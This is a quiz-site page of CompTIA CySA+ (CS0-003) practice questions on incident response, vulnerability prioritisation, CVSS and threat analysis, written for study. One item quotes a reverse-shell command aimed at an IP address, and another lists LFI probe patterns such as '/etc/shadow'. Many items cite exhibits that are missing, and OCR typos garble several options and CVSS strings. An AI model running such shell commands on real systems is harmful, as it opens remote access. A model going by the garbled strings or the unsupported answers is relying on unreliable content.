option
Cuestiones
ayuda
daypo
buscar.php

CS0-003 Exam

COMENTARIOS ESTADÍSTICAS RÉCORDS
REALIZAR TEST
Título del Test:
CS0-003 Exam

Descripción:
CS0-003 Exam

Fecha de Creación: 2025/05/13

Categoría: Otros

Número Preguntas: 367

Valoración:(0)
COMPARTE EL TEST
Nuevo ComentarioNuevo Comentario
Comentarios
NO HAY REGISTROS
Temario:

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H.

Which of the following tools would work best to prevent the exposure of PII outside of an organization?. PAM. IDS. PKI. DLP.

An organization conducted a web application vulnerability assessment against the corporate website,and the following output was observed: Which of the following tuning recommendations should the security analyst share?. Set an HttpOnlvflaq to force communication by HTTPS. Block requests without an X-Frame-Options header. Configure an Access-Control-Allow-Origin header to authorized domains. Disable the cross-origin resource sharing header.

Which of the following items should be included in a vulnerability scan report? (Choose two.). Lessons learned. Service-level agreement. Playbook. Affected hosts. Risk score. Education plan.

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?. A mean time to remediate of 30 days. A mean time to detect of 45 days. A mean time to respond of 15 days. Third-party application testing.

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?. PowerShell. Ruby. Python. Shell Script.

A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?. There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access. An on-path attack is being performed by someone with internal access that forces users into port 80. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80. An error was caused by BGP due to new rules applied over the company's internal routers.

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below: 1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities. 2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data. 3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system. According to the security policy, which of the following vulnerabilities should be the highest priority to patch?. A Thor Hammer. B Cap Shield. C Loki Dagger. D Thanos Guantlet.

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?. Business continuity plan. Vulnerability management plan. Disaster recovery plan. Asset management plan.

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise.Several high-risk cloud applications are used that increase the risk to the organization. Which of thefollowing solutions will assist in reducing the risk?. Deploy a CASB and enable policy enforcement. Configure MFA with strict access. Deploy an API gateway. Enable SSO to the cloud applications.

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?. CDN. Vulnerability scanner. DNS. Web server.

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?. Weaponization. Reconnaissance. Delivery. Exploitation.

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?. Exploitation. Reconnaissance. Command and control. Actions on objectives.

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.). Beaconinq. Domain Name System hijacking. Social engineering attack. On-path attack. Obfuscated links. Address Resolution Protocol poisoning.

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?. Conduct regular red team exercises over the application in production. Ensure that all implemented coding libraries are regularly checked. Use application security scanning as part of the pipeline for the CI/CDflow. Implement proper input validation for any data entry form.

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?. Proprietary systems. Legacy systems. Unsupported operating systems. Lack of maintenance windows.

The security team reviews a web server for XSS and runs the following Nmap scan: Which of the following most accurately describes the result of the scan?. An output of characters > and " as the parameters used m the attempt. The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe. The vulnerable parameter and characters > and " with a reflected XSS attempt.

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?. Develop a call tree to inform impacted users. Schedule a review with all teams to discuss what occurred. Create an executive summary to update company leadership. Review regulatory compliance with public relations for official notification.

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?. Code analysis. Static analysis. Reverse engineering. Fuzzing.

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?. Hard disk. Primary boot partition. Malicious tiles. Routing table. Static IP address.

Which of the following security operations tasks are ideal for automation?. A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number Call the user to help with any questions about using the application. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine.

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?. PCI Security Standards Council. Local law enforcement. Federal law enforcement. Card issuer.

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?. Mean time to detect. Number of exploits by tactic. Alert volume. Quantity of intrusion attempts.

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?. The current scanners should be migrated to the cloud. Cloud-specific misconfigurations may not be detected by the current scanners. Existing vulnerability scanners cannot scan laaS systems. Vulnerability scans on cloud environments should be performed from the cloud.

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?. Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identity the case as an HR-related investigation. Notify the SOC manager for awareness after confirmation that the activity was intentional.

Which of the following is the first step that should be performed when establishing a disaster recovery plan?. Agree on the goals and objectives of the plan. Determine the site to be used during a disaster. Demonstrate adherence to a standard disaster recovery process. Identity applications to be run during a disaster.

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?. Testing. Implementation. Validation. Rollback.

The analyst reviews the following endpoint log entry: Which of the following has occurred?. Registry change. Rename computer. New account introduced. Privilege escalation.

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?. Data enrichment. Security control plane. Threat feed combination. Single pane of glass.

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output: Which of the following choices should the analyst look at first?. wh4dc-748gy.lan (192.168.86.152). lan (192.168.86.22). imaging.lan (192.168.86.150). xlaptop.lan (192.168.86.249). p4wnp1_aloa.lan (192.168.86.56).

When starting an investigation, which of the following must be done first?. Notify law enforcement. Secure the scene. Seize all related evidence. Interview the witnesses.

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?. The lead should review what is documented in the incident response policy or plan. Management level members of the CSIRT should make that decision. The lead has the authority to decide who to communicate with at any t me. Subject matter experts on the team should communicate with others within the specified area of expertise.

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?. Firewall logs. Indicators of compromise. Risk assessment. Access control lists.

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?. Beaconing. Cross-site scripting. Buffer overflow. PHP traversal.

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?. Change the display filter to f cp. accive. pore. Change the display filter to tcg.port=20. Change the display filter to f cp-daca and follow the TCP streams. Navigate to the File menu and select FTP from the Export objects option.

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst.Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?. SLA. MOU. NDA. Limitation of liability.

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?. Command and control. Actions on objectives. Exploitation. Delivery.

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?. External. Agent-based. Non-credentialed. Credentialed.

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?. RCE. Reverse shell. XSS. SQL injection.

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?. Scope. Weaponization. CVSS. Asset value.

An analyst is reviewing a vulnerability report for a server environment with the following entries: Which of the following systems should be prioritized for patching first?. 10.101.27.98. 54.73.225.17. 54.74.110.26. 54.74.110.228.

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?. Credentialed network scanning. Passive scanning. Agent-based scanning. Dynamic scanning.

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }.

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?. Implement step-up authentication for administrators. Improve employee training and awareness. Increase password complexity standards. Deploy mobile device management.

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?. Determine the sophistication of the audience that the report is meant for. Include references and sources of information on the first page. Include a table of contents outlining the entire report. Decide on the color scheme that will effectively communicate the metrics.

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers.Which of the following actions would allow the analyst to achieve the objective?. Upload the binary to an air gapped sandbox for analysis. Send the binaries to the antivirus vendor. Execute the binaries on an environment with internet connectivity. Query the file hashes using VirusTotal.

Which of the following would help to minimize human engagement and aid in process improvement in security operations?. OSSTMM. SIEM. SOAR. QVVASP.

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?. Avoid. Transfer. Accept. Mitigate.

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?. Identify any improvements or changes in the incident response plan or procedures. Determine if an internal mistake was made and who did it so they do not repeat the error. Present all legal evidence collected and turn it over to iaw enforcement. Discuss the financial impact of the incident to determine if security controls are well spent.

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?. Single pane of glass. Single sign-on. Data enrichment. Deduplication.

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?. MITRE ATTACK. Cyber Kill Cham. OWASP. STIXTAXII.

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?. Eradication. Recovery. Containment. Preparation.

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?. Isolate Joe's PC from the network. Reimage the PC based on standard operating procedures. Initiate a remote wipe of Joe's PC using mobile device management. Perform no action until HR or legal counsel advises on next steps.

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?. Reduce the administrator and privileged access accounts. Employ a network-based IDS. Conduct thorough incident response. Enable SSO to enterprise applications.

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?. Clone the virtual server for forensic analysis. Log in to the affected server and begin analysis of the logs. Restore from the last known-good backup to confirm there was no loss of connectivity. Shut down the affected server immediately.

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?. C2 beaconing activity. Data exfiltration. Anomalous activity on unexpected ports. Network host IP address scanning. A rogue network device.

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?. Human resources must email a copy of a user agreement to all new employees. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement. All new employees must take a test about the company security policy during the cjitoardmg process. All new employees must sign a user agreement to acknowledge the company security policy.

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?. Information sharing organization. Blogs/forums. Cybersecuritv incident response team. Deep/dark web.

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned.Which of the following is the most likely reason to include lessons learned?. To satisfy regulatory requirements for incident reporting. To hold other departments accountable. To identify areas of improvement in the incident response process. To highlight the notable practices of the organization's incident response team.

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities: Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?. InLoud: Cobain: Yes Grohl: No Novo: Yes Smear: Yes Channing: No. TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No. ENameless: Cobain: Yes Grohl: No Novo: Yes Smear: No Channing: No. PBleach: Cobain: Yes Grohl: No Novo: No Smear: No Channing: Yes.

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?. Hacklivist. Advanced persistent threat. Insider threat. Script kiddie.

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?. Take a snapshot of the compromised server and verify its integrity. Restore the affected server to remove any malware. Contact the appropriate government agency to investigate. Research the malware strain to perform attribution.

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?. Disk contents. Backup data. Temporary files. Running processes.

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }.

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }.

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: Which of the following should be completed first to remediate the findings?. Ask the web development team to update the page contents. Add the IP address allow listing for control panel access. Purchase an appropriate certificate from a trusted root CA. Perform proper sanitization on all fields.

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ; Which of the following is the most likely vulnerability in this system?. Lack of input validation. SQL injection. Hard-coded credential. Buffer overflow attacks.

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?. Leave the proxy as is. Decomission the proxy. Migrate the proxy to the cloud. Patch the proxy.

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability: Which of the following log entries provides evidence of the attempted exploit?. Log entry 1. Log entry 2. Log entry 3. Log entry 4.

Which of the following is the most important factor to ensure accurate incident response reporting?. A well-defined timeline of the events. A guideline for regulatory reporting. Logs from the impacted system. A well-developed executive summary.

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?. Geoblock the offending source country. Block the IP range of the scans at the network firewall. Perform a historical trend analysis and look for similar scanning activity. Block the specific IP address of the scans at the network firewall.

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?. Disable the user's network account and access to web resources. Make a copy of the files as a backup on the server. Place a legal hold on the device and the user's network share. Make a forensic image of the device and create a SRA-I hash.

Patches for two highly exploited vulnerabilities were released on the same Friday afternoon.Information about the systems and vulnerabilities is shown in the tables below: Which of the following should the security analyst prioritize for remediation?. rogers. brady. brees. manning.

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: Which of the following vulnerability types is the security analyst validating?. Directory traversal. XSS. XXE. SSRF.

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?. Shut down the server. Reimage the server. Quarantine the server. Update the OS to latest version.

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?. Operating system version. Registry key values. Open ports. IP address.

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?. Credentialed scan. External scan. Differential scan. Network scan.

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?. Data exfiltration. Rogue device. Scanning. Beaconing.

A technician is analyzing output from a popular network mapping tool for a PCI audit: Which of the following best describes the output?. The host is not up or responding. The host is running excessive cipher suites. The host is allowing insecure cipher suites. The Secure Shell port on this host is closed.

A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output: Which of the following hosts should be patched first, based on the metrics?. host01. host02. host03. host04.

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?. config. ini. ntds.dit. Master boot record. Registry.

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability,and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?. Interview the users who access these systems. Scan the systems to see which vulnerabilities currently exist. Configure alerts for vendor-specific zero-day exploits. Determine the asset value of each system.

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?. CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H. CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H. VSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?. Transfer. Accept. Mitigate. Avoid.

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?. Wipe the computer and reinstall software. Shut down the email server and quarantine it from the network. Acquire a bit-level image of the affected workstation. Search for other mail users who have received the same file.

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?. Perform a tabletop drill based on previously identified incident scenarios. Simulate an incident by shutting down power to the primary data center. Migrate active workloads from the primary data center to the secondary location. Compare the current plan to lessons learned from previous incidents.

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-oflife date. Which of the following best describes a security analyst's concern?. Any discovered vulnerabilities will not be remediated. An outage of machinery would cost the organization money. Support will not be available for the critical machinery. There are no compensating controls in place for the OS.

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would most likely lead the team to this conclusion?. High GPU utilization. Bandwidth consumption. Unauthorized changes. Unusual traffic spikes.

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below: Which of the following has most likely occurred?. An Office document with a malicious macro was opened. A credential-stealing website was visited. A phishing link in an email was clicked. A web browser vulnerability was exploited.

During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's personal email. Which of the following should the analyst recommend be done first?. Place a legal hold on the employee's mailbox. Enable filtering on the web proxy. Disable the public email access with CASB. Configure a deny rule on the firewall.

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?. SLA. LOI. MOU. KPI.

Which of the following describes the best reason for conducting a root cause analysis?. The root cause analysis ensures that proper timelines were documented. The root cause analysis allows the incident to be properly documented for reporting. The root cause analysis develops recommendations to improve the process. The root cause analysis identifies the contributing items that facilitated the event.

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?. SOAR. SIEM. SLA. IoC.

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?. Passive network foot printing. OS fingerprinting. Service port identification. Application versioning.

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?. Command and control. Data enrichment. Automation. Single sign-on.

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?. SIEM ingestion logs are reduced by 20%. Phishing alerts drop by 20%. False positive rates drop to 20%. The MTTR decreases by 20%.

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: • created the initial evidence log. • disabled the wireless adapter on the device. • interviewed the employee, who was unable to identify the website that was accessed • reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?. Update the system firmware and reimage the hardware. Install an additional malware scanner that will send email alerts to the analyst. Configure the system to use a proxy server for Internet access. Delete the user profile and restore data from backup.

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this requirement?. SIEM. CASB. SOAR. EDR.

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mean time between queries is less than one second. • The average query length exceeds 100 characters. Which of the following attacks most likely occurred?. DNS exfiltration. DNS spoofing. DNS zone transfer. DNS poisoning.

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?. SIEM. XDR. SOAR. EDR.

A company is in the process of implementing a vulnerability management program. no-lich of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?. Non-credentialed scanning. Passive scanning. Agent-based scanning. Credentialed scanning.

A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?. Generate a hash value and make a backup image. Encrypt the device to ensure confidentiality of the data. Protect the device with a complex password. Perform a memory scan dump to collect residual data.

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?. The server was configured to use SSI- to securely transmit data. The server was supporting weak TLS protocols for client connections. The malware infected all the web servers in the pool. The digital certificate on the web server was self-signed.

A security analyst is reviewing the following alert that was triggered by FIM on a critical system: Which of the following best describes the suspicious activity that is occurring?. A fake antivirus program was installed by the user. A network drive was added to allow exfiltration of data. A new program has been set to execute on system start. The host firewall on 192.168.1.10 was disabled.

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?. grep [IP address] packets.pcap. cat packets.pcap | grep [IP Address]. tcpdump -n -r packets.pcap host [IP address]. strings packets.pcap | grep [IP Address].

Given the following CVSS string-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H Which of the following attributes correctly describes this vulnerability?. A user is required to exploit this vulnerability. The vulnerability is network based. The vulnerability does not affect confidentiality. The complexity to exploit the vulnerability is high.

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two). Drop the tables on the database server to prevent data exfiltration. Deploy EDR on the web server and the database server to reduce the adversaries capabilities. Stop the httpd service on the web server so that the adversary can not use web exploits. use micro segmentation to restrict connectivity to/from the web and database servers. Comment out the HTTP account in the / etc/passwd file of the web server. Move the database from the database server to the web server.

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?. Increasing training and awareness for all staff. Ensuring that malicious websites cannot be visited. Blocking all scripts downloaded from the internet. Disabling all staff members' ability to run downloaded applications.

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?. MOU. NDA. BIA. SLA.

Which of the following risk management principles is accomplished by purchasing cyber insurance?. Accept. Avoid. Mitigate. Transfer.

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company: Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?. Vulnerability A. Vulnerability B. Vulnerability C. Vulnerability D.

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?. Shut the network down immediately and call the next person in the chain of command. Determine what attack the odd characters are indicative of. Utilize the correct attack framework and determine what the incident response will consist of. Notify the local law enforcement for incident response.

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?. /etc/ shadow. curl localhost. ; printenv. cat /proc/self/.

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?. This is a normal password change URL. The security operations center is performing a routine password audit. A new VPN gateway has been deployed. A social engineering attack is underway.

The security analyst received the monthly vulnerability report. The following findings were included in the report • Five of the systems only required a reboot to finalize the patch application. • Two of the servers are running outdated operating systems and cannot be patched The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?. Compensating controls. Due diligence. Maintenance windows. Passive discovery.

Which of the following best describes the goal of a tabletop exercise?. To test possible incident scenarios and how to react properly. To perform attack exercises to check response effectiveness. To understand existing threat actors and how to replicate their techniques. To check the effectiveness of the business continuity plan.

During the log analysis phase, the following suspicious command is detected- Which of the following is being attempted?. Buffer overflow. RCE. ICMP tunneling. Smurf attack.

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network.Which of the following metrics should the team lead include in the briefs?. Mean time between failures. Mean time to detect. Mean time to remediate. Mean time to contain.

An analyst is examining events in multiple systems but is having difficulty correlating data points.Which of the following is most likely the issue with the system?. Access rights. Network segmentation. Time synchronization. Invalid playbook.

Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you have been tasked with handling this Situation. 1. How many employees clicked on the link in the phishing email? 2. On how many workstations was the malware installed? 3. What is the executable file name of the malware?. According to the email server logs, 25 employees clicked on the link in the phishing email. According to the file server logs, the malware was installed on 15 workstations. The executable file name of the malware is svchost.EXE.

